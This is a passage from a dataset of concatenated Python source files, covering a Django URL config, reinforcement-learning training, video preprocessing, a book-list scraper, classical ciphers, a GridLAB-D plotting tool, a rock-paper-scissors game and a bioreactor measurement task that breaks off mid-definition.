+{"seq_id":"243581226","text":"from django.urls import path\n\nfrom caseworker.advice import views\n\nurlpatterns = [\n path(\"\", views.AdvicePlaceholderView.as_view(), name=\"advice_placeholder\"),\n path(\"case-details/\", views.CaseDetailView.as_view(), name=\"case_details\"),\n path(\"select-advice/\", views.SelectAdviceView.as_view(), name=\"select_advice\"),\n path(\"approve-all/\", views.GiveApprovalAdviceView.as_view(), name=\"approve_all\"),\n path(\"refuse-all/\", views.RefusalAdviceView.as_view(), name=\"refuse_all\"),\n]\n","sub_path":"caseworker/advice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"247064734","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 18 12:40:41 2020\n\"\"\"\n\n# Module imports\nimport tensorflow as tf\nfrom tf_agents.environments import tf_py_environment\nfrom tf_agents.policies.random_tf_policy import RandomTFPolicy\nfrom tf_agents.replay_buffers.tf_uniform_replay_buffer import TFUniformReplayBuffer\nfrom tf_agents.trajectories import trajectory\nfrom tf_agents.policies.policy_saver import PolicySaver\n\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport numpy as np\n\n# Written by us imports\nfrom SquigglesEnvironment import SquigglesEnvironment\nfrom experience_replay import ExperienceReplay\nfrom basic_agent import generic_dqn_agent # a function\n\n# Globals\nNUMBER_ITERATION = 20000\nCOLLECTION_STEPS = 1\nBATCH_SIZE = 64\nEVAL_EPISODES = 10\nEVAL_INTERVAL = 1000\n\ndef get_average_return(environment, policy, episodes=10):\n\n total_return = 0.0\n\n for _ in range(episodes):\n time_step = environment.reset()\n episode_return = 0.0\n\n while not time_step.is_last():\n action_step = policy.action(time_step)\n time_step = environment.step(action_step.action)\n episode_return += time_step.reward\n\n total_return += episode_return\n avg_return = total_return / episodes\n\n return avg_return.numpy()[0]\n\ndef init():\n train_env = SquigglesEnvironment()\n evaluation_env = SquigglesEnvironment()\n\n train_env = tf_py_environment.TFPyEnvironment(train_env)\n evaluation_env = tf_py_environment.TFPyEnvironment(evaluation_env)\n\n 
agent, _ = generic_dqn_agent(train_env)\n\n experience_replay = ExperienceReplay(agent, train_env, BATCH_SIZE)\n\n return agent, train_env, evaluation_env, experience_replay\n\ndef training_loop(agent, train_env, evaluation_env, experience_replay):\n agent.train_step_counter.assign(0)\n\n avg_return = get_average_return(evaluation_env, agent.policy, EVAL_EPISODES)\n returns = [avg_return]\n\n for _ in tqdm(range(NUMBER_ITERATION)):\n\n for _ in range(COLLECTION_STEPS):\n experience_replay.timestamp_data(train_env, agent.collect_policy)\n\n experience, info = next(experience_replay.iterator)\n train_loss = agent.train(experience).loss\n\n if agent.train_step_counter.numpy() % EVAL_INTERVAL == 0:\n avg_return = get_average_return(evaluation_env, agent.policy, EVAL_EPISODES)\n print('Iteration {0} – Average Return = {1}, Loss = {2}.'.format(agent.train_step_counter.numpy(), avg_return, train_loss))\n returns.append(avg_return)\n\n #show_current(1000, evaluation_env, agent.policy)\n\n return returns\n\ndef show_current(ITER, env, policy):\n N = env.observation_spec().shape[0]\n state = env.reset()\n\n the_hits = np.zeros(ITER)\n agent_hits = []\n rewards = []\n for j in range(ITER):\n a = policy.action(state)\n agent_hits.append(a.action)\n\n state = env.step(a)\n rewards.append(state.reward)\n\n play = False\n if np.any(state.observation[0][0] == 0):\n play = True\n the_hits[j] = int(play)\n\n plt.figure()\n plt.plot(the_hits)\n plt.plot(agent_hits)\n plt.title(\"Action and space\")\n\n plt.figure()\n plt.plot(rewards)\n plt.title(\"Rewards\")\n plt.show()\n\ndef main():\n agent, train_env, evaluation_env, experience_replay = init()\n\n returns = training_loop(\n agent,\n train_env,\n evaluation_env,\n experience_replay\n )\n\n # save policy\n PolicySaver(agent.policy).save('policy_saved')\n\n plt.plot(returns)\n plt.title(\"Rewards overall\")\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"versions/mirror_no_silence_punish/cart_pole.py","file_name":"cart_pole.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"470246091","text":"import utils\nimport sys\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"phone_table_path\", type=str)\nparser.add_argument(\"pdf_table_path\", type=str)\nparser.add_argument(\"--typ\", type=str, default = 'mono', choices=['mono','biphone'])\n\nargs = parser.parse_args()\n\n\nphones = utils.read_phone_txt(args.phone_table_path,0)\nvalid_phone = []\nfor x in phones:\n for s in ['<','#']:\n if x.startswith(s):\n break\n else:\n valid_phone.append(x)\nif args.typ == 'mono':\n utils.write_phone_file(valid_phone, args.pdf_table_path, True)\nelse:\n L = []\n for i in range(len(valid_phone)):\n for j in range(len(valid_phone)+1):\n if j == 0:\n L.append('start' + '_' + valid_phone[i])\n else:\n L.append(valid_phone[j-1] + '_' + valid_phone[i])\n utils.write_phone_file(L, args.pdf_table_path, True)\n\n\n","sub_path":"src/WFST-decoder/scripts/phones2pdf.py","file_name":"phones2pdf.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"484866651","text":"'''\nCode for processing BDD100K dataset - small train subset 40K (Yu et al. 2020, https://bdd-data.berkeley.edu/)\nBased on code related to PredNet - Lotter et al. 2016 (https://arxiv.org/abs/1605.08104 https://github.com/coxlab/prednet).\nMethod of resizing was specified (bicubic). 
\n'''\n\nimport os, pdb\nimport imageio, random\nimport hickle as hkl\nimport h5py\nimport numpy as np\nfrom scipy.misc import imresize\nfrom scipy.misc import toimage\nfrom kitti_settings import *\n\n\ndesired_sz = (128, 160)\n# change 30fps to 10 fps\noffset = 0\nshift = 3\nsources_name = \"sources_bdd100k_train_40K.hkl\"\n# use the same sequences as were used during training\nsources = hkl.load(DATA_DIR+sources_name)\n\nsel_sequences = []\nfor seq in sources:\n    if seq not in sel_sequences:\n        sel_sequences.append(seq)\n\n\nX=[]\nfor sequence in sel_sequences:\n    vid = imageio.get_reader(DATA_DIR+\"raw_bdd100k_dataset/bdd100k/videos/\"+\"train/\"+sequence, 'ffmpeg', fps=30)\n    \n    for i, im in enumerate(vid):\n        # change 30fps to 10 fps\n        if (i-offset) % shift == 0:\n            target_ds = float(desired_sz[0]) / im.shape[0]\n            im = imresize(im, (desired_sz[0], int(np.round(target_ds * im.shape[1]))), 'bicubic')\n            d = int((im.shape[1] - desired_sz[1]) / 2)\n            im = im[:, d:d + desired_sz[1]]\n            X.append(im)\n\nX = np.array(X)\n\n\nhkl.dump(X, os.path.join(DATA_DIR, 'X_bdd100k_train_40K' + '.hkl'))\n\n\n\n\n","sub_path":"process_selected_bdd100k_train_40K.py","file_name":"process_selected_bdd100k_train_40K.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"434787220","text":"'''\nScrape Douban Books Top 250\nFields: book title\n        rating\n        author\nLibraries: built-in urllib\n           third-party lxml\nFunction-oriented style\n'''\nfrom urllib import request\nimport urllib\nfrom lxml import etree\nimport time\n# File IO object\nwith open('douban.txt','a',encoding='utf-8') as fp:\n    # Fetch the page source\n    def MakePage():\n        i = 0\n        while i <= 225:\n            base_url = \"https://book.douban.com/top250?start={0}\".format(i)\n            headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n            req = urllib.request.Request(url=base_url, headers=headers)\n            resp = urllib.request.urlopen(req).read()\n            print(resp)\n            time.sleep(2)\n            i += 25\n            html = resp.decode('utf-8') # decode the page source\n            htmls = etree.HTML(html) # parse the source\n            StoInfo(htmls) # call the data-cleaning method with the parsed page\n\n    # Clean the data and save it\n    def StoInfo(htmls):\n        book_name = htmls.xpath('//div[@class=\"pl2\"]/a/@title') # book titles\n        ratings = htmls.xpath('//span[@class=\"rating_nums\"]/text()') # ratings\n        writers = htmls.xpath('//p[@class=\"pl\"]/text()') # authors\n        lens = len(book_name) # length of one field\n        i = 0\n        while i < lens:\n            print('loading......')\n            book_names = book_name[i] # current book title\n            rating = ratings[i] # current rating\n            writer = writers[i].split('/')[0] # current author\n            fp.write('《'+book_names+'》' + ' Rating: '+rating+' Author: '+writer + '\\n' )\n            i += 1\n\n    if __name__ == '__main__':\n        MakePage()\n\n\n","sub_path":"douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
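# --- Added example (not part of the scraped file above) ---
# StoInfo walks three parallel XPath result lists by index; zip() expresses
# the same pairing more idiomatically and stops at the shortest list, which
# also guards against ragged results (a sketch reusing the names above):
# for title, rating, author_line in zip(book_name, ratings, writers):
#     fp.write('《' + title + '》 Rating: ' + rating +
#              ' Author: ' + author_line.split('/')[0] + '\n')
# --- End added example ---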
+{"seq_id":"530753096","text":"\"\"\"\r\nAuthor: Nguyễn mạnh trung\r\nDate: 19/09/2021\r\nProblem: Assume that the variable teststring refers to a string. Write a loop that prints\r\neach character in this string, followed by its ASCII value.\r\nSolution:\r\n\"\"\"\r\nteststring = input(\"Enter a string: \")\r\nfor i in range(len(teststring)):\r\n    print(\"ASCII value of character %c = %d\" % (teststring[i], ord(teststring[i])))","sub_path":"nguyenmanhtrung_44617_ca18a1a-cp3/nguyenmanhtrung_44617_ca18a1a/excercise/page_70_exercise_05.py","file_name":"page_70_exercise_05.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"309147573","text":"##### CREATIVE COMMONS LICENSE BLOCK #####\n# This program is licensed under a Creative Commons Attribution 4.0\n# International License (CC BY 4.0). You are free to share (copy and\n# redistribute the material in any medium or format) and adapt (remix,\n# transform, and build upon the material) for any purpose, even\n# commercially, as long as you give appropriate credit, provide a link\n# to the license, and indicate if changes were made. You may do so in\n# any reasonable manner, but not in any way that suggests the licensor\n# endorses you or your use.\n\nfrom cipher import settings\n\ndef _atbash(alphabet, char):\n    return alphabet[len(alphabet)-1-alphabet.index(char)]\n\t\ndef _caesar(alphabet, char, shift):\n    return alphabet[(alphabet.index(char)+shift) % len(alphabet)]\n\t\ndef atbash(text):\n    output = ''\n    \n    for char in text:\n        if char in settings.LOWERCASE:\n            output += _atbash(settings.LOWERCASE, char)\n        elif char in settings.UPPERCASE:\n            output += _atbash(settings.UPPERCASE, char)\n        else:\n            output += char\n    \n    return output\n\t\ndef caesar(text, shift=3):\n    output = ''\n    \n    for char in text:\n        if char in settings.LOWERCASE:\n            output += _caesar(settings.LOWERCASE, char, shift)\n        elif char in settings.UPPERCASE:\n            output += _caesar(settings.UPPERCASE, char, shift)\n        else:\n            output += char\n    \n    return output\n\t\ndef rot13(text):\n    return caesar(text, 13)\n
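# --- Added example (not part of the original module) ---
# Quick sanity checks for the helpers above, assuming cipher.settings defines
# LOWERCASE as 'abcdefghijklmnopqrstuvwxyz' and UPPERCASE likewise (inferred,
# not confirmed by the source):
# atbash('abc')          -> 'zyx'    (a<->z, b<->y, c<->x)
# caesar('xyz', 3)       -> 'abc'    (the shift wraps around the alphabet)
# rot13(rot13('Hello'))  -> 'Hello'  (rot13 is its own inverse)
# --- End added example ---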
\n# NOTE: Currently converts all plaintext to lowercase (so, no uppercase\n# letters for now). Will fix in the future.\ndef keyword(key, text):\n    # Construct the cipher alphabet: deduplicated key letters first, then the\n    # remaining letters of the alphabet, starting after the key's last letter\n    alphabet = ''\n    for char in key.lower():\n        if char not in alphabet:\n            alphabet += char\n    \n    i = settings.LOWERCASE.index(alphabet[len(alphabet) - 1])\n    for x in range(len(settings.LOWERCASE)):\n        i = (i + 1) % len(settings.LOWERCASE)\n        if settings.LOWERCASE[i] not in alphabet:\n            alphabet += settings.LOWERCASE[i]\n    \n    # Return substitution with no shift\n    output = ''\n    for char in text:\n        if char.lower() in alphabet:\n            output += alphabet[settings.LOWERCASE.index(char.lower()) % len(settings.LOWERCASE)]\n        else:\n            output += char\n    \n    return output\n","sub_path":"cipher/substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"379169944","text":"import json \nimport os \nimport sys, getopt\nfrom datetime import datetime\nimport importlib, copy\nfrom importlib import util\n\ndef help():\n\tprint('Syntax:')\n\tprint('json2png.py -i|--ifile <filename> [-o|--ofile <filename>] [-t|--type <type>] [<options> ...]')\n\tprint('  -i|--ifile <filename>    : [REQUIRED] json input file name.')\n\tprint('  -o|--ofile <filename>    : [OPTIONAL] png output file name.')\n\tprint('  -t|--type <type>         : [OPTIONAL] specify output type')\n\tprint('Output types')\n\tprint('  summary                  : [DEFAULT] output a summary of model')\n\tprint('    -s|--size <X>x<Y>      : [OPTIONAL] image size in pixels')\n\tprint('  profile                  : output the voltage profile')\n\tprint('    -d|--dpi <resolution>  : [OPTIONAL] image resolution in dots per inch')\n\tprint('    -l|--limit <percent>   : [OPTIONAL] voltage range limit in percent')\n\tprint('    --with-nodes           : [OPTIONAL] label branching nodes')\n\nfilename_json = ''\nfilename_png = ''\nbasename = ''\noutput_type = 'summary'\nwith_nodes = False\nresolution = \"300\"\nsize = \"300x200\"\nlimit = None\nxlim = None\n\ntry : \n\topts, args = getopt.getopt(sys.argv[1:],\"hi:o:t:d:l:s:x:\",[\"help\",\"ifile=\",\"ofile=\",\"type=\",\"with-nodes\",\"dpi=\",\"limit=\",\"size=\",\"xlim\"])\nexcept getopt.GetoptError:\n\tsys.exit(2)\nif not opts : \n\thelp()\n\tsys.exit(1)\nfor opt, arg in opts:\n\tif opt in (\"-h\",\"--help\"):\n\t\thelp()\n\t\tsys.exit(0)\n\telif opt in (\"-i\", \"--ifile\"):\n\t\tfilename_json = arg\n\t\tif filename_png == '':\n\t\t\tif filename_json[-5:] == \".json\":\n\t\t\t\tbasename = filename_json[:-5]\n\t\t\telse: \n\t\t\t\tbasename = filename_json\n\t\t\tfilename_png = basename + \".png\"\n\telif opt in (\"-o\", \"--ofile\"):\n\t\tfilename_png = arg\n\telif opt in (\"-t\",\"--type\"):\n\t\toutput_type = arg\n\telif opt == '--with-nodes':\n\t\twith_nodes = True\n\telif opt in (\"-d\",\"--dpi\"):\n\t\tresolution = arg\n\telif opt in (\"-s\",\"--size\"):\n\t\tsize = arg\n\telif opt in (\"-l\",\"--limit\"):\n\t\tlimit = int(arg)/100\n\telif opt in (\"-x\",\"--xlim\"):\n\t\txlim = arg.split(',')\n\telse:\n\t\traise Exception(\"'%s' is an invalid command line option\" % opt)\n\nwith open(filename_json,\"r\") as f :\n\tdata = json.load(f)\n\tassert(data['application']=='gridlabd')\n\tassert(data['version'] >= '4.2.0')\n\nif output_type == 'csvplot':\n\n\timport pandas as pd\n\timport matplotlib.pyplot as plt\n\tcsv = pd.read_csv(filename_png.replace('.png','.csv'),index_col='timestamp')\n\tax = csv.plot(figsize=(7,7))\n\tax.set_xticklabels(ax.get_xticklabels(),rotation='vertical')\n\tax.grid()\n\tax.legend()\n\tax.set_title(filename_png)\n\tplt.margins(0.2)\n\tplt.subplots_adjust(bottom=0.3)\n\tplt.savefig(filename_png)\n\n\n#\n# -t summary\n#\nelif output_type == 'summary':\n\n\tfilename = data[\"globals\"][\"modelname\"][\"value\"]\n\tfrom PIL import 
Image, ImageDraw, ImageFont\n\tsz = size.split(\"x\")\n\tsx = int(sz[0])\n\tsy = int(sz[1])\n\timg = Image.new(mode=\"RGB\",size=(sx,sy),color=\"white\")\n\tdraw = ImageDraw.Draw(img)\n\n\tdef node(draw,x,y,text,vmargin=1,hmargin=1,fnt=ImageFont.load_default()):\n\t\tsz = draw.multiline_textsize(text,font=fnt)\n\t\tdraw.rectangle([x-sz[0]/2-hmargin,y-sz[1]/2-vmargin,x+sz[0]/2+hmargin,y+sz[1]/2+vmargin],outline=\"black\",fill=\"white\")\n\t\tdraw.multiline_text((x-sz[0]/2,y-sz[1]/2),text,font=fnt,fill=\"black\")\n\n\timport hashlib\n\tmd5 = hashlib.md5()\n\twith open(filename,\"r\") as f:\n\t\tmd5.update(f.read().encode())\n\tnode(draw,x=sx/2,y=sy/2,text=\"\"\"Name..... %s\nDigest... %s\nDate..... %s\"\"\" % (filename,md5.hexdigest(),datetime.now().strftime(\"%y-%m-%d %H:%M:%S\")),vmargin=2,hmargin=3)\n\timg.save(filename_png)\n\n#\n# -t profile\n#\nelif output_type == 'profile':\n\n\timport matplotlib.pyplot as plt\n\tplt.figure(1);\n\n\tdef find(objects,property,value):\n\t\tresult = []\n\t\tfor name,values in objects.items():\n\t\t\tif property in values.keys() and values[property] == value:\n\t\t\t\tresult.append(name)\n\t\treturn result\n\n\tdef get_string(values,prop):\n\t\treturn values[prop]\n\n\tdef get_complex(values,prop):\n\t\treturn complex(get_string(values,prop).split(\" \")[0].replace('i','j'))\n\n\tdef get_real(values,prop):\n\t\treturn get_complex(values,prop).real\n\n\tdef get_voltages(values):\n\t\tph = get_string(values,\"phases\")\n\t\tvn = abs(get_complex(values,\"nominal_voltage\"))\n\t\tresult = []\n\t\ttry:\n\t\t\tva = abs(get_complex(values,\"voltage_A\"))/vn\n\t\texcept:\n\t\t\tva = None\n\t\ttry:\n\t\t\tvb = abs(get_complex(values,\"voltage_B\"))/vn\n\t\texcept:\n\t\t\tvb = None\n\t\ttry:\n\t\t\tvc = abs(get_complex(values,\"voltage_C\"))/vn\n\t\texcept:\n\t\t\tvc = None\n\t\treturn ph,vn,va,vb,vc\n\n\tdef profile(objects,root,pos=0):\n\t\tfromdata = objects[root]\n\t\tph0,vn0,va0,vb0,vc0 = get_voltages(fromdata)\n\n\t\tcount = 0\n\t\tfor link in find(objects,\"from\",root):\n\t\t\tlinkdata = objects[link]\n\t\t\tlinktype = \"-\"\n\t\t\tif \"length\" in linkdata.keys():\n\t\t\t\tlinklen = get_real(linkdata,\"length\")/5280\n\t\t\telse:\n\t\t\t\tlinklen = 0.0\n\t\t\tif not \"line\" in get_string(linkdata,\"class\"):\n\t\t\t\tlinktype = \"--o\"\n\t\t\tif \"to\" in linkdata.keys():\n\t\t\t\tto = linkdata[\"to\"]\n\t\t\t\ttodata = objects[to]\n\t\t\t\tph1,vn1,va1,vb1,vc1 = get_voltages(todata)\n\t\t\t\tprofile(objects,to,pos+linklen)\n\t\t\t\tcount += 1\n\t\t\t\tif \"A\" in ph0 and \"A\" in ph1: plt.plot([pos,pos+linklen],[va0,va1],\"%sk\"%linktype)\n\t\t\t\tif \"B\" in ph0 and \"B\" in ph1: plt.plot([pos,pos+linklen],[vb0,vb1],\"%sr\"%linktype)\n\t\t\t\tif \"C\" in ph0 and \"C\" in ph1: plt.plot([pos,pos+linklen],[vc0,vc1],\"%sb\"%linktype)\n\t\t\t\tif limit:\n\t\t\t\t\tif (not va1 is None and va1>1+limit) or (not vb1 is None and vb1>1+limit) or (not vc1 is None and vc1>1+limit) : \n\t\t\t\t\t\tprint(\"json2png.py WARNING: node %s voltage is high (%g, %g, %g), phases = '%s', nominal voltage=%g\" % (to,va1*vn1,vb1*vn1,vc1*vn1,ph1,vn1));\n\t\t\t\t\tif (not va1 is None and va1<1-limit) or (not vb1 is None and vb1<1-limit) or (not vc1 is None and vc1<1-limit) : \n\t\t\t\t\t\tprint(\"json2png.py WARNING: node %s voltage is low (%g, %g, %g), phases = '%s', nominal voltage=%g\" % (to,va1*vn1,vb1*vn1,vc1*vn1,ph1,vn1));\n\t\tif count > 1 and with_nodes:\n\t\t\tplt.plot([pos,pos,pos],[va0,vb0,vc0],':*',color='grey',linewidth=1)\n\t\t\tplt.text(pos,min([va0,vb0,vc0]),\"[%s] 
\"%root,color='grey',size=6,rotation=90,verticalalignment='top',horizontalalignment='center')\n\n\tfor obj in find(objects=data[\"objects\"],property=\"bustype\",value=\"SWING\"):\n\t\tprofile(objects=data[\"objects\"],root=obj)\n\tplt.xlabel('Distance (miles)')\n\tplt.ylabel('Voltage (pu)')\n\tplt.title(data[\"globals\"][\"modelname\"][\"value\"])\n\tplt.grid()\n\tplt.legend([\"A\",\"B\",\"C\"])\n\tplt.tight_layout()\n\tif limit:\n\t\tplt.ylim([1-limit,1+limit])\n\tif xlim:\n\t\tplt.xlim([float(xlim[0]),float(xlim[1])])\n\tplt.savefig(filename_png, dpi=int(resolution))\n\nelse:\n\tmodname = sys.argv[0].replace(\"json2png.py\",\"json2png-%s.py\"%output_type)\n\tif os.path.exists(modname):\n\n\t\timport importlib, copy\n\t\tmodspec = util.spec_from_file_location(output_type, modname)\n\t\tmod = importlib.import_module(\"json2png-%s\"%output_type)\n\t\targv = copy.deepcopy(sys.argv)\n\t\targv[0] = modname\n\t\tmod.main(argv)\n\n\telse:\n\n\t\traise Exception(\"type '%s' is not valid\" % output_type)\n\n### oneline method\n# from PIL import Image, ImageDraw, ImageFont\n# im = Image.new(mode=\"RGB\",size=(600,400),color=\"white\")\n# draw = ImageDraw.Draw(im)\n# fnt = ImageFont.load_default()\n\n# def node(x,y,label):\n# \tsz = draw.multiline_textsize(label,font=fnt)\n# \tdraw.rectangle([x-sz[0]/2-1,y-sz[1]/2-1,x+sz[0]/2+1,y+sz[1]/2+1],outline=\"black\",fill=\"white\")\n# \tdraw.multiline_text((x-sz[0]/2,y-sz[1]/2),label,font=fnt,fill=\"black\")\n# node(320,200,\"test\")\n# draw.line((0,0,640,400),fill=\"black\")\n# draw.line((0,400,640,0),fill=\"black\")\n# im.save(filename_png)\n\n### general graphing method\n# import networkx as nx\n# G = nx.DiGraph()\n# for name, properties in data[\"objects\"].items():\n# \tkeys = properties.keys();\n# \tif \"from\" in keys and \"to\" in keys:\n# \t\tf = properties[\"from\"];\n# \t\tt = properties[\"to\"];\n# \t\tG.add_nodes_from([f,t],weight=0);\n# \t\tif \"power_in\" in keys and \"power_out\" in keys:\n# \t\t\ti = properties[\"power_in\"]\n# \t\t\to = properties[\"power_out\"]\n# \t\t\tp = abs(complex(max(i,o).split(\" \")[0]))\n# \t\t\tif i > o:\n# \t\t\t\tG.add_edge(f,t,weight=p)\n# \t\t\telse:\n# \t\t\t\tG.add_edge(t,f,weight=p)\n# \t\telse:\n# \t\t\tG.add_edge(f,t,weight=0);\n# #H = nx.DiGraph()\n# print(\"Graph nodes:\",G.number_of_nodes())\n# print(\"Graph edges:\",G.number_of_edges())\n\n# import matplotlib.pyplot as plt\n\n# plt.figure(1);\n# H = nx.planar_layout(G)\n# nx.draw_networkx(G, H, node_size=2, with_labels=False, font_size=6, font_color='b', label=basename)\n# plt.tight_layout()\n# plt.savefig(filename_png, dpi=1000)\n","sub_path":"converters/json2png.py","file_name":"json2png.py","file_ext":"py","file_size_in_byte":8287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"68188796","text":"#!/usr/bin/env python3\nimport random\nimport os\nfrom colorama import Fore\n\n\"\"\"This program plays a game of Rock, Paper, Scissors between two Players,\nand reports both Player's scores each round.\"\"\"\n\nmoves = ['rock', 'paper', 'scissors']\n\n\"\"\"The Player class is the parent class for all of the Players\nin this game\"\"\"\n\n\nclass Player:\n # Master class for Every Player\n # To create a move of every player\n def move(self):\n return 'rock'\n\n # Learn the opponent moves\n def learn(self, my_move, their_move):\n self.their_move = their_move\n\n\ndef beats(one, two):\n # Check to see game conditions based on rules\n return ((one == 'rock' and two == 'scissors') or\n (one == 
'scissors' and two == 'paper') or\n (one == 'paper' and two == 'rock'))\n\n\ndef clear_screen():\n # To clear the screen after every game\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\nclass ReflectPlayer(Player):\n # Computer player reflects the Human player moves after each move\n def __init__(self):\n super().__init__()\n self.their_move = None\n\n def learn(self, my_move, their_move):\n self.their_move = their_move\n\n def move(self):\n # if it's first move select a random move else reflect HumanPlayer move\n if self.their_move is None:\n return random.choice(moves)\n return self.their_move\n\n\nclass CyclePlayer(Player):\n # CyclePlayer class cycles through moves by making\n # everytime a different move\n def __init__(self):\n super().__init__()\n self.my_move = None\n\n def learn(self, my_move, their_move):\n self.my_move = my_move\n\n def move(self):\n # Cycle through every move\n if self.my_move is None:\n return random.choice(moves)\n elif self.my_move == 'rock':\n return 'paper'\n elif self.my_move == 'paper':\n return 'scissors'\n elif self.my_move == 'scissors':\n return 'rock'\n\n\nclass RandomPlayer(Player):\n # RandomPlayer used to generate the moves randomly\n def move(self):\n return random.choice(moves)\n\n\nclass HumanPlayer(Player):\n # HumanPlayer to get the user's move\n def move(self):\n while True:\n try:\n # Foreground colors are used to color the Fonts\n move = input(f\"{Fore.RED}Rock, \\\n{Fore.BLUE}Paper, \\\n{Fore.YELLOW}Scissors?{Fore.RESET} > \").lower()\n if move in moves:\n return move\n except ValueError:\n pass\n\n\nclass Game:\n def __init__(self, p1, p2):\n # Initialize the Human Player and Computer Player\n self.p1 = p1\n self.p2 = p2\n\n def play_round(self):\n # play_round is a method to play rounds\n # Get the moves for Human and Computer Players\n move1 = self.p1.move()\n move2 = self.p2.move()\n\n print(f\"Player 1: {move1} Player 2: {move2}\")\n\n if beats(move1, move2):\n # beats function is used to find out who 'WINS'\n print(f\"{Fore.GREEN}** PLAYER ONE WINS **{Fore.RESET}\")\n self.p1_score += 1\n print(f\"Score: Player One - {self.p1_score}, \\\nPlayer Two - {self.p2_score}\")\n elif beats(move2, move1):\n print(f\"{Fore.LIGHTCYAN_EX}** PLAYER TWO WINS **{Fore.RESET}\")\n self.p2_score += 1\n print(f\"Score: Player One - {self.p1_score}, \\\nPlayer Two - {self.p2_score}\")\n else:\n print(f\"{Fore.LIGHTMAGENTA_EX}** TIE **{Fore.RESET}\")\n print(f\"Score: Player One - {self.p1_score}, \\\nPlayer Two - {self.p2_score}\")\n\n # learn method is used to learn the Human Player moves\n self.p1.learn(move1, move2)\n self.p2.learn(move2, move1)\n\n def play_game(self):\n # play_game is used to initiate the game\n print(f\"{Fore.RED}Rock{Fore.RESET} \\\n{Fore.BLUE}Paper{Fore.RESET} \\\n{Fore.YELLOW}Scissors,{Fore.RESET} \\\n{Fore.RESET}Go!\\n\")\n\n while True:\n try:\n # Get the play best of\n rounds = int(input(\"You want to play best of? 
\\n> \"))\n self.p1_score = 0\n self.p2_score = 0\n\n for round in range(rounds):\n print(f\"\\nRound {round+1} --\")\n self.play_round()\n\n # Display Final Scores\n print(f\"\\n{Fore.LIGHTMAGENTA_EX}Final Scores are: \\\n{Fore.LIGHTBLUE_EX}Player one - \\\n{self.p1_score}{Fore.RESET} and \\\n{Fore.LIGHTYELLOW_EX}Player two - \\\n{self.p2_score}{Fore.RESET}\")\n\n # Display who WINS, LOSES or TIES\n if self.p1_score > self.p2_score:\n print(f\"{Fore.GREEN}You Win!{Fore.RESET}\")\n elif self.p1_score < self.p2_score:\n print(f\"{Fore.LIGHTCYAN_EX}You lose!{Fore.RESET}\")\n else:\n print(f\"{Fore.LIGHTMAGENTA_EX}Match is a TIE!{Fore.RESET}\")\n break\n except ValueError:\n print(\"Please enter a number.\")\n\n\ndef intro():\n # Displays the introduction and rules of the game\n print(f\"\"\"\n******************************************\n* {Fore.GREEN}Welcome to the world of{Fore.RESET} *\n* {Fore.RED}Rock,{Fore.RESET} *\n* {Fore.BLUE}Paper,{Fore.RESET} *\n* {Fore.YELLOW}Scissors!{Fore.RESET} *\n* {Fore.GREEN}Rules:{Fore.RESET} *\n* {Fore.RED}1. Paper beats Rock;{Fore.RESET} *\n* {Fore.BLUE}2. Rock beats Scissors;{Fore.RESET} *\n* {Fore.YELLOW}3. Scissors beat Paper.{Fore.RESET} *\n******************************************\n\"\"\")\n\n\nif __name__ == '__main__':\n game = Game(HumanPlayer(), random.choice(\n [ReflectPlayer(), CyclePlayer()]))\n\n while True:\n clear_screen()\n intro()\n game.play_game()\n play_again = input(\"\\nWant to play again y/n? \").lower()\n if play_again == 'n':\n print(\"Bye!\")\n break\n","sub_path":"rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"578815844","text":"from collections import deque\nfrom threading import Thread\nfrom time import sleep\nfrom typing import Dict\n\nimport numpy as np\n\nfrom core.data.command import Command\nfrom core.device.abstract import Connector\nfrom core.device.manager import DeviceManager\nfrom core.task.abstract import BaseTask\nfrom core.task.manager import TaskManager\nfrom core.utils.observable import Observable, Observer\n\n\nclass PBRMeasureAll(BaseTask):\n def __init__(self, config):\n self.__dict__.update(config)\n\n required = ['sleep_period', 'lower_tol', 'upper_tol', 'od_channel',\n 'max_outliers', 'device_id', 'pump_id']\n\n self.validate_attributes(required, type(self).__name__)\n\n self.latest_values = deque(maxlen=2)\n self.outliers = 0\n\n self.device: Connector = DeviceManager().get_device(self.device_id)\n self.average_od = self.measure_initial_od_average()\n self.od = Observable()\n\n super(PBRMeasureAll, self).__init__()\n\n self.commands_to_execute: Dict[str, dict] = {\n \"pwm_settings\": {\n \"id\": \"12\"\n },\n \"light_0\": {\n \"id\": \"9\",\n \"args\": [0]\n },\n \"light_1\": {\n \"id\": \"9\",\n \"args\": [1]\n },\n \"od_0\": {\n \"id\": \"5\",\n \"args\": [0, 30]\n },\n \"od_1\": {\n \"id\": \"5\",\n \"args\": [1, 30]\n },\n \"ph\": {\n \"id\": \"4\",\n \"args\": [5, 0]\n },\n \"temp\": {\n \"id\": \"2\"\n },\n \"pump\": {\n \"id\": \"6\",\n \"args\": [self.pump_id]\n },\n \"o2\": {\n \"id\": \"14\"\n },\n \"ft_0\": {\n \"id\": 